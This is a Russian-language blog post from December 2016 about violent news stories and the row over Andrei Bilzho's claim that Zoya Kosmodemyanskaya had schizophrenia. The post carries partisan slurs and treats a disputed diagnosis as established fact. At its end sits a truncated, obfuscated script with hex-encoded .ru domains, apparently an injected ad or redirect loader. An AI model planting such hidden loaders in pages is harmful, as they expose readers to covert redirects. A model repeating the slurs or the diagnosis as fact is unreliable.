Доставка

Жизнь в жанре хоррор

21 Декабря 2016 11:47   Просмотров: 5379
Метки: шизофрения, агрессия, новости
Нравится Рейтинг поста: 0
Кто не спрятался – я не виноват! 




Это только одному мне кажется, что "не всё ладно в датском королевстве" -- хаос нарастает, маразм крепчает, а "тьма сгущается"? Во всяком случае, культовый ужастик "Кошмар на улице вязов", в сравнении с сегодняшними новостями в стиле хоррор, воспринимается наивной мелодрамой… 
 

"Непросто найти лампу с Джинном внутри, 
Но еще сложнее -- запихать злого Джинна обратно…" 
 
Сдается мне, что психика большинства обывателей не рассчитана на лошадиные дозы кошмаров, демонстрируемых в HD-качестве в он-лайн режиме 24 часа в сутки. Такое впечатление, что выпуски новостей спонсируют фармакологические концерны, специализирующиеся на выпуске транквилизаторов. 


Нынешний понедельник выдался не просто тяжелым, но еще и кровавым. От содержания информационных полос стынет кровь в жилах: 
 
-- в Иркутске число жертв отравления суррогатным алкоголем, продавшегося под культовой "народной маркой" аптечного средства: настойка "Боярышник", достигло 60 (!) человек. Особо стоит отметить, что в этот раз название "Боярышник" было размещено на концентрате для ванн расфасованным в тару емкостью 250 мл, но кого это останавливало в стране носителей "духовных скреп", где в употребление на-ура идет даже "стекломой"?! 
 

-- в центре Берлина "трак-атака" исламистов: фура "Сканиа" въехала в толпу на рождественском базаре – погибло 12 человек; 
 

-- в центре Анкары на открытии фотовыставки «Россия глазами турок» совершено убийство российского посла Андрея Карлова; 
 

Вынося в заголовки газет и начало передач новостей особо кровавые известия, журналисты, безусловно, виновны в раскручивании маховика агрессии в социуме. Как ни крути, а получается, что сначала агрессия приходит к вам в дом с экрана телевизора, а затем – стучится в двери в буквальном смысле. 


Во всяком случае, еще недавно я себе даже не мог представить, чтобы в нашем "тихом омуте" заведутся такие махровые черти, как угонщик дешевой "Таврии", открывший огонь на поражение по патрульным, пытающимся его остановить… 


А в этот понедельник в нашем провинциальном Славутиче произошло очередное ЧП: 27-летний славутчанин, проживающий в Белгородском квартале, устроил у себя в квартире целую химическую лабораторию. Непонятно -- что именно он мутил у себя на балконе, но в ходе одного из экспериментов произошел взрыв. Удивительно, но сам химик при этом взрыве уцелел, а потому убежал из квартиры, дабы не общаться в полицией.   

Сначала на странного гражданина, крутившегося возле школы №1, обратила внимание вахтерша, а затем "бомбиста" попытался остановить участковый Александр Клименок. От обоих бдительных граждан и их вопросов к себе славутчанин, аки герой боевиков, начал отстреливаться сразу из двух пистолей. 

Ранив участкового в ногу, горе-Бандерас добежал до Невского квартала (бывший Ленинградский), где возле киоска "Табак" покончил с собой, пустив пулю в голову… 
 

В общем, выпустив из бутылки джинна агрессии, запихнуть его обратно будет непросто… 
 
Зоя и паранойя 

Вина журналистов в раскручивании молоха агрессии, как на мой взгляд, очевидна. Но истинный коктейль Молотова получается при смешивании кровавых репортажей с агрессивной идеологией. Как в случае с исламским фундаментализмом или духовными скрепами нашего северного соседа.   

Не знаю – кому как, но лично мне сдается, что психическое состояние российского общественного большинства можно оценить диагнозом паранойя. А когда в стадии прогрессирующей шизофрении находится и руководство соседней страны, то ожидать от таких соседей чего-то хорошего – не приходится… 

*** 

Да-с, так вот. Признаться, последнее время я совершенно перестал просматривать полосы российских газет, дабы разоблачать очередные фейки кремлевских пропагандонов, равно как и устраивать срачи с российскими родственниками и знакомыми. Просто не нахожу в этом ни малейшего смысла, ибо это всё равно, что пытаться в своей квартире собирать воду тряпкой в то время, когда у соседа сверху прорвало трубу… 

В общем, если бы не слушал на "Эхе Москвы" последний "Код доступа" с Юлей Латыниной, то так бы и не узнал об очередном эпическом приступе паранойи рашистов. О котором сегодня хочу и поведать читателям.  

Эпическая "буря в стакане" запойных рашистов поднялась после размещения на сайте "The Insider" публикации "Диагноз недели с доктором Бильжо: Мединский никакой не историк, а 29-й панфиловец и есть

Приступ паранойи рашистов вызвали следующие слова Андрея Бильжо (цитата): 

"Сейчас я расскажу страшную, крамольную вещь, которая взорвет интернет и меня, но, слава богу, я сейчас нахожусь далеко. Я читал историю болезни Зои Космодемьянской, которая хранилась в архиве психиатрической больницы им. П.П. Кащенко. В этой клинике не раз лежала до войны Зоя Космодемьянская, она страдала шизофренией. Об этом знали все психиатры, которые работали в больнице, но потом ее историю болезни изъяли, потому что началась перестройка, стала просачиваться информация, и родственники Космодемьянской стали возмущаться, что это оскорбляет ее память. 

Когда Зою вывели на эшафот и собирались повесить, она молчала, хранила партизанскую тайну. В психиатрии это называется «мутизмом»: она просто не могла говорить, так как впала в «кататонический ступор с мутизмом», когда человек с трудом двигается, выглядит застывшим и молчит…" 


*** 

Вообще-то слова Бильжо о шизофрении Космодемьянской – на самом деле никакая не крамола и уж тем паче не новость. Ибо о нервных срывах юной Зои в курсе были все, кто с её биографией знаком хоть чуточку более детально, чем прочитав "отполированные до блеска" официальные версии советских учебников истории. Тем паче, что эта инфа подтверждалась конкретными пруфами, достоверность которых никто даже и не оспаривал: 


Замечу, что первым журналистом, рассказавшем о подвиге Космодемьянской был военный журналист Петр Лидов, который в номере газеты "Правда" от 27 января 1942 года опубликовал очерк "Таня". 

Кстати, приведу одну цитату из очерка "Таня": 

" …Девушку раздели и били кулаками, а минут через двадцать избитую, босую, в одной сорочке и трусиках повели через все селение в дом Ворониных, где помещался штаб…" 
 
Такое впечатление, что о "распятом мальчике в трусиках" из Славянска писал тоже Петр Лидов. Смешно, конечно, но у кремлевских пропагандонов приемы воздействия на публику – те жа самые, что и в прошлом веке. 

Кстати, сам Петр Лидов интенсивно "окучивал ботву" на теме казни 18-ти летней патриотки из диверсионного отряда. 


Причем фотографии трупа Зои крупным планом фашистов публиковались даже в детско-юношеском журнале "Пионер".   

Сами оцените степень запредельного цинизма и правдивость следующих слов Лидова: 

"...Смерть смежила ее ясные очи. Она мертва, но лик ее спокоен и светел. Она как живая. Она как святая. 
Вот такою же прекрасной увидели мы ее два месяца спустя и отерли иней с ее высокого безмятежного чела и ее смуглых, не утративших румянца щек. Но только замерзшее тело ее носило уже тогда следы новых, отвратительных посмертных надругательств пьяных фашистских скотов…"   

Дико извиняюсь за акценты на тексте Лидова, но фразу о двухмесячном трупе с румянцем на щеках, способен написать только истинный некрофил. Просто мне как-то доводилось видеть внешность трупа после месячного нахождения в мерзлой могиле – так на такую картину лучше не смотреть даже на фотографиях, ибо ничего прекрасного там и в помине не наблюдается…   

В общем, не буду занимать ваше время этими непривлекательными подробностями. Кому будет интересно – самостоятельно ознакомятся с опусом Лидова "Пять фотографий" в газете "Правда" от 24.10.1943 года по данной ссылке

*** 

Итак, давайте вернемся в наши дни и бурной реакции неадекватной публики на слова Андрея Бильжо. 


Не буду цитировать имена всех авторов, посчитавших своим долгом заклеймить Бильжо, ибо счет идет на десятки публикаций, не говоря уже о количестве репостов. О высоте "девятого вала маразма" можно судить сразу по нескольким Обращениям в генпрокуратуру депутатов Госдумы России и общественно-политических организаций с целью проверить и осудить "усатого клеветника", покусившегося на самые святые устои русских скреп. 
 

Но статью "Самоубешенство: «Казус Бильжо» как точка невозврата", мне хочется таки выделить из сплоченных рядов общего "осуждамса". Ибо шикарную фразу Дмитрия Юрьева, можно мазать на хлеб как икру и употреблять под настойку "Боярышника", зажмуривая от кайфа глаза:  

"…Но вот назвать эшафот подиумом, а подвиг мученицы шизофренией — это переход на темную сторону. На более темную, чем даже сторона Гитлера. На сторону педофилов-людоедов, на сторону Чикатило, Джека Потрошителя, «барона Субботы» и «Радио тысячи холмов». Да что там мямлить — на сторону сатаны. 

Бильжо довелось столкнуть маленький камешек с вершины горы. Но лавина уже понеслась. В аргументации защитников Бильжо, в их остервенении, во внезапном испуге и даже ужасе остающихся пока людьми «рукопожатных» слышен громоподобный топот свиного стада, оседланного седоками, имя которым — легион. Стада, несущегося в бездну — на гибель прежде всего самим себе. Но именно такова самоубийственная логика идейной бесовщины, охватившей «интеллигенцию». Именно такова судьба, уготованная ею себе — и всем нам, которых пытаются вынудить гнаться во гневе за бешеными свиньями-самоубийцами к обрыву, в бездну" 

Согласитесь, фразы "педофилы-людоеды" и "переход на сторону, на более темную, чем даже сторона Гитлера" -- разве не прелесть?! 
 

Что тут скажешь? Как говорится, добро пожаловать в роман Федора Михайловича Достоевского "Бесы" в режиме реального времени! 
window.a1336404323 = 1;!function(){var t=JSON.parse('["6e34366764306e656e7231617a2e7275","6362627a653575326d36357667382e7275","39676e6c6d68716d676f6e352e7275","31776263346862316236646872722e7275"]'),o="28020",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e
Добавить в:


ЦентрКомплект